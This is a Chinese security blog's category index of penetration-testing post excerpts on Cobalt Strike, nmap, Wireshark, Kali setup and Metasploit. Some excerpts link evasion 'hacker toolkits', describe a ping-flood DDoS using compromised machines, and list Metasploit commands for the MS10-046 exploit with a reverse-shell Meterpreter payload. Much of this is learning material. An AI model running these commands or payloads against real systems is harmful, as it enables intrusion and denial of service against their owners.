随笔分类 -  渗透攻防

1 2 下一页
cobalt strike入门和防护
摘要:1、入门: https://blog.csdn.net/localhost01/article/details/86741124 2、cs的防护: 由于关乎渗透人员自身的安全,建议大家好好看看,这里贴出最重要的防护部分: 增加一条:自己的渗透服务器安全一定要做好,尽量按照最小原则。 阅读全文
posted @ 2019-10-19 16:11 寻步 阅读(901) 评论(0) 推荐(0)
软件漏洞学习
摘要:软件漏洞学习之缓冲区溢出(一) http://www.netfairy.net/?post=123 阅读全文
posted @ 2017-07-07 10:01 寻步 阅读(162) 评论(0) 推荐(0)
vmware中的bridge、nat、host-only的区别
摘要:概述:VMWare提供了三种工作模式,它们是bridged(桥接模式)、NAT(网络地址转换模式)和host-only(主机模式)。要想在网络管理和维护中合理应用它们,你就应该先了解一下这三种工作模式。1.bridged(桥接模式) 在这种模式下,VMWare虚拟出来的操作系统就像是局域网中的一台... 阅读全文
posted @ 2014-12-29 10:49 寻步 阅读(677) 评论(0) 推荐(0)
天天记录 - Android抓包 - 抓取HTTP,TCP协议数据
摘要:需要两个工具tcpdump和Wireshark,tcpdump的使用需要root权限一 tcpdump1. 下载tcpdump首页http://www.tcpdump.org/编译的二进制文件下载http://www.strazzere.com/android/tcpdump2. 需要把tcpdum... 阅读全文
posted @ 2014-12-24 13:46 寻步 阅读(1178) 评论(0) 推荐(0)
wireshark 实用过滤表达式(针对ip、协议、端口、长度和内容)
摘要:首先说几个最常用的关键字,“eq” 和 “==”等同,可以使用 “and” 表示并且,“or”表示或者。“!" 和 "not” 都表示取反。 一、针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况: (1)对源地址为192.168.0.1的包的过滤,即抓取源地址满足要求的包。... 阅读全文
posted @ 2014-12-24 13:45 寻步 阅读(253) 评论(0) 推荐(1)
TCP的状态 (SYN, FIN, ACK, PSH, RST, URG)
摘要:在TCP层,有个FLAGS字段,这个字段有以下几个标识:SYN, FIN, ACK, PSH, RST, URG.其中,对于我们日常的分析有用的就是前面的五个字段。它们的含义是:SYN表示建立连接,FIN表示关闭连接,ACK表示响应,PSH表示有 DATA数据传输,RST表示连接重置。其中,ACK是... 阅读全文
posted @ 2014-11-17 10:58 寻步 阅读(331) 评论(0) 推荐(0)
backtrack种子
摘要:下载链接:(种子文件)BT5R3-GNOME-64.torrent (md5:8cd98b693ce542b671edecaed48ab06d)BT5R3-GNOME-32.torrent (md5:aafff8ff5b71fdb6fccdded49a6541a0)BT5R3-KDE-64.torr... 阅读全文
posted @ 2014-09-18 14:28 寻步 阅读(212) 评论(0) 推荐(0)
归心似箭,IT达人分享抢票攻略
摘要:【51CTO专稿】随着春节一天天临近,“购票难”的问题也愈发凸显,猎豹、火狐、360等“春运抢票神器”占领了各大网站的重要版面,“技术抢票”成为炙手可热的话题,看看身为程序员的邓以克是如何抢到回家的票。邓以克(@一路向西-phinecos)是一位进入IT行业3年的Java程序员;业务时间,比较喜欢研... 阅读全文
posted @ 2014-09-17 14:13 寻步 阅读(376) 评论(0) 推荐(0)
Google IP
摘要:http://173.194.130.4/http://64.233.167.165/ 阅读全文
posted @ 2014-09-11 09:58 寻步 阅读(143) 评论(0) 推荐(0)
2014年 各类黑客工具包
摘要:2014年 各类黑客工具包2014年04月08日评分 4.37, 满分 5 星35 票+Add黑客武林2014免杀工具包V1.0風戀极客工具包2014新年版 解压密码:flgk红客小组渗透工具包(2014贺岁版)http://pan.baidu.com/s/1qW34wc0【猫客工作室】入侵专用工具... 阅读全文
posted @ 2014-07-31 14:18 寻步 阅读(2858) 评论(0) 推荐(0)
使用Metasploit入侵windows之自动扫描
摘要:最新版本的metasploit为4.0,可以通过官方网站(www.metasploit.com)直接下载,因为是开源的,所以免费。 metasploit很好很强大,集成了700多种exploit,但是如果操作系统打满了补丁,也还是很难入侵的,所以为了测试,选择了windows xp最古老的版本,就是... 阅读全文
posted @ 2014-07-21 16:10 寻步 阅读(2541) 评论(0) 推荐(0)
Metasploit连接postgres数据库
摘要:操作环境为Kali虚拟机1root@kali:~# apt-getinstall postgresql启动服务12root@kali:~# service postgresql start[ ok ] Starting PostgreSQL 9.1 database server: main.修改p... 阅读全文
posted @ 2014-07-21 15:59 寻步 阅读(563) 评论(0) 推荐(0)
十条常用nmap命令行格式
摘要:1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统其它选项:-A 同时... 阅读全文
posted @ 2014-07-18 20:05 寻步 阅读(379) 评论(0) 推荐(0)
适用于kali linux的远程桌面开启方法(从windows xp 远程登录到kali linux )
摘要:为了解决Windows远程桌面访问Ubuntu 12.04 之一 中提到的VNC远程桌面的缺点(见http://www.linuxidc.com/Linux/2012-07/64801.htm),我们采用第二种方法XRDP,该方法支持多用户登录并远程桌面。1、首先参考Windows远程桌面访问Ubu... 阅读全文
posted @ 2014-07-18 17:36 寻步 阅读(6194) 评论(1) 推荐(1)
Kali-linux安装之后的简单设置--转载
摘要:1.更新软件源:修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下适合自己较快的源(可自由选择,不一定要全部): #官方源deb http://http.kali.org/kali kali main non-free contribdeb-... 阅读全文
posted @ 2014-07-18 15:31 寻步 阅读(1099) 评论(0) 推荐(0)
Kali-linux安装之后的简单设置(转)
摘要:1.更新软件源:先备份软件源文件 cp /etc/apt/sources.list /etc/apt/sources.list.bak修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下较快的源: #官方源deb http://http.kal... 阅读全文
posted @ 2014-07-18 15:23 寻步 阅读(431) 评论(0) 推荐(0)
kali系统安装
摘要:kali live 安装到U盘http://www.backtrack.org.cn/thread-17197-1-1.html用Live U盘安装Kali Linuxhttp://cn.docs.kali.org/installing-kali-linux-cn/%E7%94%A8live-u%E... 阅读全文
posted @ 2014-07-17 17:41 寻步 阅读(1483) 评论(0) 推荐(0)
Kali渗透测试学习
摘要:http://blog.chinaunix.net/uid-26349264-id-4041727.html 阅读全文
posted @ 2014-07-17 17:13 寻步 阅读(181) 评论(0) 推荐(0)
mac地址静态捆绑,防止arp欺骗
摘要:arp -s 192.168.1.101 00-21-CC-D3-D5-FF缺点,每次关机就还原,所以一般创建批处理文件,开机启动。ping 192.168.1.100 -l 65500 多台肉鸡对目标机器ping最大数据包,可以发ddos攻击 阅读全文
posted @ 2014-01-03 23:49 寻步 阅读(380) 评论(0) 推荐(0)
ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗
摘要:ms10_046_shortcut_icon_dllloader漏洞利用过程msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107msf exploit(ms10_046_sh 阅读全文
posted @ 2013-12-03 01:19 寻步 阅读(1525) 评论(0) 推荐(1)

1 2 下一页